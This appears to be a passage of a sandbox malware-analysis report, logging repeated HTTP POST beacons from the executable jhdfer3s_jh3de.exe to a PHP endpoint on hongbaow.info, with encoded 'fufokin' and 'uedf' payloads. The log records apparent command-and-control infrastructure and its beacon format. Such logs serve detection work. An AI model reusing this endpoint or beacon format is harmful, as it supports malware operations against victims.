                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:57 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MOKZMCG%2BFvgUWQIQp3jK%2B3MN0c%2FqYWnqAXdtU7BS4ZVeHINGL7fQT1R%2BjCAlwvJLaKVcvHVamn0tDJa7YZ39jpWOo68SwnWXpDgoyI42JMmaFadJIDUOYs8Vj61c%2Be3y"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddec768658ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1878&rtt_var=708&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1542525&cwnd=237&unsent_bytes=0&cid=d1bb7c1807d26e2e&ts=325&x=0"
                            2025-01-22 07:35:57 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.449782104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:00 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:00 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:00 UTC817INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGZo9qt47n37wNgwCyiBR%2Fi0qqk44zsB%2B68Yxc637ddkdym%2BW9aCFkv%2FLzER9deNn%2F68qOFpEgd9uJ3EP%2Ban%2BzkfbuAQw9zXwoKZNhcFg67T9A%2FX7ha5VHAhsXDGuDsD"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddeda2c1c4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1563&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1846932&cwnd=180&unsent_bytes=0&cid=e696a28c4a8ebebd&ts=351&x=0"
                            2025-01-22 07:36:00 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.449788104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:01 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:01 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:01 UTC808INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:01 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCGynp9HAFDM00EKXQDlJg6i0ElizZc3ucsHERHpZyKmJv%2F4zxF4kQnXAwPqjZIanis1BysBRmqYuhAp6N5urqjZIvNO1uu5fSaVOQojAe1yldILqv5Fx1nNLoIc%2BY%2BG"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddedeee3e4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1550&rtt_var=595&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1817050&cwnd=180&unsent_bytes=0&cid=4e6b83ad5b18b29b&ts=342&x=0"
                            2025-01-22 07:36:01 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.449799104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:03 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:03 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:03 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WaTNKKc8qfUu2f4Osc%2BZxbtUYa4dqt%2FWGrMA1jYruxE54GnlHmMR15c3eGPp5AgvG8Mo9S9n48fGM4sulJq7YHOWHJM38dfFJJ6W3kdu97NgZbogvZnF3UHOmZLuy702"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddeeb9a7cde95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1464&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1994535&cwnd=246&unsent_bytes=0&cid=af3ce29696f98c03&ts=329&x=0"
                            2025-01-22 07:36:03 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.449819104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:05 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:05 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:05 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:05 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IileYJXWvOgCYodbcwijw5V8RXTAuyg3gEWEmEqleiigdYW9snqW22NutK7N1GySXWJEPfNJ6z1QNn48BcexMA8DmcsZK6nNE7DQuBvjeutPu8enhPlLRBL%2BgMd%2FI%2B9b"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddefbbc3342eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1531&rtt_var=593&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1814791&cwnd=215&unsent_bytes=0&cid=52d9b4f11752b6eb&ts=337&x=0"
                            2025-01-22 07:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.449826104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:06 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:06 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:07 UTC814INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:07 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4SdcD781Hm92Me9bM%2FPiwSzgT%2BcdbOo5M43NZ550bp5onKN9FZCNT3Dyr%2BpsjqYlfiEWP%2BzZv%2BMOzLuXyCgGoSlvaaOu6qBKKzzT0fj3XjZslwa38OckqSuBivh%2FGVv"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf0349627c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1746&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1602634&cwnd=218&unsent_bytes=0&cid=29269aac86e7ff1e&ts=329&x=0"
                            2025-01-22 07:36:07 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.449837104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:08 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:08 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:08 UTC817INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDq1hdiFjeo9dZ8y6Dty%2FFtedvZOomaZJiRDpGErRL%2Frx6Spap0Fhr600fp%2FuhBDfa9RLpiEIuM6aQx0fC%2BFfuwmPjbpFrhIWDE%2FK%2FH7NfP6%2BUpSycptMK1XCIU52hy%2B"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf0ac9f64414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1562&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1859872&cwnd=180&unsent_bytes=0&cid=9fe248b30aaa58c3&ts=322&x=0"
                            2025-01-22 07:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.449850104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:10 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:10 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:10 UTC819INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Tj97%2FVZF7%2B7T79Jx568j3my1S3rO4%2FVlMyl6sk%2BH%2BO4O4V2h3Jc%2FaRxATJIvB%2FlVaIMrt7kBC6BiH6F%2FUh8be3G9uwx38oO3zbpFnjFtzp4vyVZG%2F4bNyje7KbQqoTQ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf18dbacc358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1579&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1849271&cwnd=155&unsent_bytes=0&cid=2575f4bb47866405&ts=339&x=0"
                            2025-01-22 07:36:10 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.449864104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:12 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:12 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:12 UTC803INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Hq5pxfuxtTs42hw5MbvHx3MvOcTUnRwbjtMjCv9nAYQzp8toeqJXza2EW5a7AVNImRH2bAjlinHn8m4L9gptiFmBSgcOi2XT0GBrR%2BXolMbPUTNuWG2hh2KCqifIZ26"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf260bc77c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1773&rtt_var=681&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1589548&cwnd=218&unsent_bytes=0&cid=22050372b8d75b2a&ts=344&x=0"
                            2025-01-22 07:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.449865104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:12 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:12 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:13 UTC820INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13jPNYsvzLKG%2FHOfvUolY6FB9hmCW0ovwZlBnB2vTMTtl0iJqN7%2F0fZznZPUdqFDRxdpdO7%2B12bmARC7R6yEZ%2BmoQxOtEVay%2F%2BlPOzQGHWa%2FQCHQre%2FMpIqUU%2BUIEVRx"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf27c89dde95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1434&min_rtt=1427&rtt_var=549&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1967654&cwnd=246&unsent_bytes=0&cid=6fce26cab25113d7&ts=353&x=0"
                            2025-01-22 07:36:13 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.449881104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:14 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:14 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:14 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dg1W6Y5BO66Utsqi2QidY7azGsAFnSn2b4wUn%2BRFkAeRtUPn0eSgOb2ByEtMu%2By87djsZsBaCcNWqAZxw8f5%2FOFoU5SbynXVtAyJs%2BclP5ft6sjFnH7xQB7yow38R22B"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf3238998ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1775&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1616832&cwnd=237&unsent_bytes=0&cid=ea468f174b49d11f&ts=322&x=0"
                            2025-01-22 07:36:14 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.449892104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:16 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:16 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
